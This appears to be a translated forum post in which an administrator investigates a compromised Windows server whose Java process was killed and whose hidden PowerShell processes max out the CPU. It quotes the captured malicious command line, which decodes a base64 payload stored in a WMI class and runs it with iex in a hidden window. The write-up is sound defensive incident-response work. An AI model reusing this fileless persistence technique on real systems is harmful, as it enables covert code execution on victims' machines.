After the server is hacked, the phenomenon is:
- java process was killed
- Two powershell processes appear, and the CPU usage is as high as close to 100%
Process:
- Modify the powershell policy to prohibit powershell from running any scripts (Get-ExecutionPolicy: Get the current execution policy; set-ExecutionPolicy Restricted: The execution policy does not allow any scripts to run)
- Checked the information about powershell, found in the following page (https://social.technet.microsoft.com/Forums/zh-CN/8b80a46c-fce6-4804-9ea0-c8266ff638b1/powershell-cpu100?forum=WinServerPreviewZHCN) A tool Process Monitor (download address: https://docs.microsoft.com/en-us/sysinternals/downloads/procmon ) can be used to monitor process details;
- Download Process Monitor, decompress it and run it, click the filter to add filter rules: 1, process name, 2, contains, 3, powershell; after running the filter, only the processes of powershell are listed, and then you can see the detailed information. The command information of the process is:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:systemcore_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:systemcore_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')" - Found this page again: What if PowerShell is disabled? See how I use PowerShell to bypass application whitelists, environmental restrictions, and antivirus software , which tells how to use the command wmic to view process details:
wmic process list full > Desktop\save.txtAccording to the introduction of the article, through the parent process, it may be possible to find out who invoked powershell, and thus may be able to find out where the hacker is attacking
- Some enthusiastic netizens suggest reading this article: Powershell Best Security Practices